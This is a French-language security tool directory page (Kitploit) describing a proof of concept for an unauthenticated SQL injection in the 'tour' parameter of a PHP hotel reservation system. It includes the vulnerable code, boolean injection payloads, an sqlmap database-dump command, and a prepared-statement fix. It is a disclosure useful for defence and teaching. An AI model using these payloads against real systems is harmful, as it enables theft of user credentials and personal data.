Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-10290-SQLI — Preuve de concept pour une injection SQL non authentifiée dans Hotel and Tourism Reservation System 1.0, démontrant l'extraction de la base de données via le paramètre tour. | Kitploit
Outils/GitHubGitHub/xmyronn/cve-2026-10290-sqli
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationSécurité des Bases de Données
GitHubxmyronn/cve-2026-10290-sqli

CVE-2026-10290-SQLI

Preuve de concept pour une injection SQL non authentifiée dans Hotel and Tourism Reservation System 1.0, démontrant l'extraction de la base de données via le paramètre tour.

Voir le dépôt
2il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Système de réservation hôtelière et touristique - Injection SQL non authentifiée dans tour.php

Détails de la vulnérabilité

ChampDétails
TitreSystème de réservation hôtelière et touristique - Injection SQL via le paramètre GET tour
Fournisseurcode-projects.org
URL du fournisseurhttps://code-projects.org/hotel-and-tourism-reservation-in-php-with-source-code/
ProduitSystème de réservation hôtelière et touristique
Version1.0
Type de vulnérabilitéInjection SQL
CWECWE-89
Score CVSS9.8 (Critique)
Vecteur CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Fichier affecté/ht/tour.php
Paramètre affectétour (GET)
Authentification requiseNon
Exploitable à distanceOui
ChercheurSyed Imad Uddin Alvi

Description

Une vulnérabilité critique d'injection SQL existe dans le paramètre GET tour de tour.php dans le système de réservation hôtelière et touristique 1.0. Le paramètre est passé directement dans une requête SQL brute sans assainissement, sans requêtes préparées et sans validation des entrées. Un attaquant distant non authentifié peut manipuler la requête pour extraire, modifier ou supprimer toutes les données de la base de données. La vulnérabilité a été confirmée par un dump complet de la base de données à l'aide de sqlmap.

Code vulnérable dans tour.php :

root@kitploit:~
if(isset($_GET['tour'])) {
    $tourID = $_GET['tour'];
    $select = $db->query("SELECT * FROM tourism WHERE id = '{$tourID}' ");
    $s = $db->query("SELECT * FROM tourism WHERE id = '{$tourID}' ");
    $data = mysqli_fetch_assoc($s);

$tourID est tiré directement de $_GET['tour'] et interpolé dans la requête SQL sans aucun assainissement.


Étapes de reproduction

Configuration : Installez le système de réservation hôtelière et touristique 1.0 sur XAMPP et accédez-y à http://<target>/ht/

Étape 1 — Visitez n'importe quelle page de circuit en tant qu'utilisateur non authentifié :

root@kitploit:~
http://<target>/ht/tour.php?tour=4
Screenshot 2026-05-12 001635

Étape 2 — Injectez un guillemet simple pour casser la requête SQL et confirmer la vulnérabilité :

root@kitploit:~
http://<target>/ht/tour.php?tour='

Résultat : Une erreur MySQL fatale est déclenchée — confirmant que l'entrée non assainie atteint la requête SQL.

Screenshot 2026-05-12 001643

Étape 3 — Confirmez l'injection SQL avec une charge utile booléenne :

root@kitploit:~
http://<target>/ht/tour.php?tour=' or 1=1 -- -

Résultat : La page se charge normalement avec les données du circuit — l'injection booléenne est réussie.

Screenshot 2026-05-12 001654

Étape 4 — Effectuez un dump de l'intégralité de la base de données à l'aide de sqlmap :

root@kitploit:~
sqlmap -r sqli.txt --dump --batch

Résultat : sqlmap extrait avec succès toutes les tables de hotel_db, y compris users, rooms, tour_reserves, gallery — compromission totale de la base de données confirmée.

Screenshot 2026-05-12 001722

Impact

Un attaquant distant non authentifié peut :

  • Extraire toutes les données de la base de données, y compris les identifiants utilisateur, les e-mails, les numéros de téléphone et les détails de réservation
  • Contourner l'authentification en extrayant les identifiants administrateur
  • Modifier ou supprimer tout enregistrement de la base de données
  • Potentiellement exécuter du code à distance via INTO OUTFILE si les privilèges de fichiers sont accordés

Cause racine

Le paramètre GET tour est interpolé directement dans une requête SQL brute sans recours aux requêtes préparées, aux requêtes paramétrées ou à l'assainissement des entrées :

root@kitploit:~
// VULNERABLE
$tourID = $_GET['tour'];
$select = $db->query("SELECT * FROM tourism WHERE id = '{$tourID}' ");

// FIXED — use prepared statements
$stmt = $db->prepare("SELECT * FROM tourism WHERE id = ?");
$stmt->bind_param("i", $_GET['tour']);
$stmt->execute();

Références

  • CWE-89 : Neutralisation incorrecte des éléments spéciaux utilisés dans une commande SQL
  • OWASP : Injection SQL
  • Système de réservation hôtelière et touristique — code-projects.org

Découvert par

Syed Imad Uddin Alvi — Chercheur en sécurité indépendant

Télécharger l’outil